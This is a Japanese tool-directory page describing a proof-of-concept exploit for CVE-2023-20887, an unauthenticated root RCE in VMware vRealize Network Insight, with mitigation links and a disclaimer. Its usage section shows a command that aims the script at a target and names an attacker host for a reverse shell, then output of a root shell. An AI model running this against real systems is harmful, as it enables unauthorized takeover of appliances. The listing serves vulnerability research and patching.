Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-20887 — VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887) | Kitploit
ツール/GitHubGitHub/malwareman007/cve-2023-20887
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールレッドチーミング
GitHubmalwareman007/cve-2023-20887

CVE-2023-20887

VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)

リポジトリを見る
812年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

CVE-2023-20887

CVE-2023-20887 VMWare Aria Operations for Networks (vRealize Network Insight) の認証不要RCEに関するPOC

技術的分析

脆弱性の根本原因分析は私のブログでご覧いただけます: https://kushagraojha.medium.com/vmware-vrealize-network-insight-cve-2023-20887-193f3c3d30a0

概要

VMWare Aria Operations for Networks (vRealize Network Insight) は、Apache Thrift RPC インターフェースを介してユーザー入力を受け入れる際にコマンドインジェクションに対して脆弱です。この脆弱性により、リモートの認証されていない攻撃者が、基盤となるオペレーティングシステム上で root ユーザーとして任意のコマンドを実行できる可能性があります。RPC インターフェースはリバースプロキシによって保護されていますが、これを迂回することが可能です。VMware はこの問題の深刻度を Critical(重要)と評価し、最大 CVSSv3 基本スコアは 9.8 です。悪意のある攻撃者は、アプライアンス上で 'root' コンテキストでのリモートコード実行を達成できます。VMWare 6.x バージョンが脆弱です。

使用方法

root@kitploit:~
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release

緩和策

最新バージョンにアップデートするか、Progress Advisory の指示に従って緩和策を実施してください。

  • https://www.vmware.com/security/advisories/VMSA-2023-0012.html

免責事項

このソフトウェアは、純粋に学術研究と効果的な防御技術の開発を目的として作成されたものであり、明示的に許可された場合を除き、システムへの攻撃に使用することを意図していません。プロジェクトメンテナーは、ソフトウェアの誤用に対して一切の責任を負いません。責任を持って使用してください。

ツールをダウンロード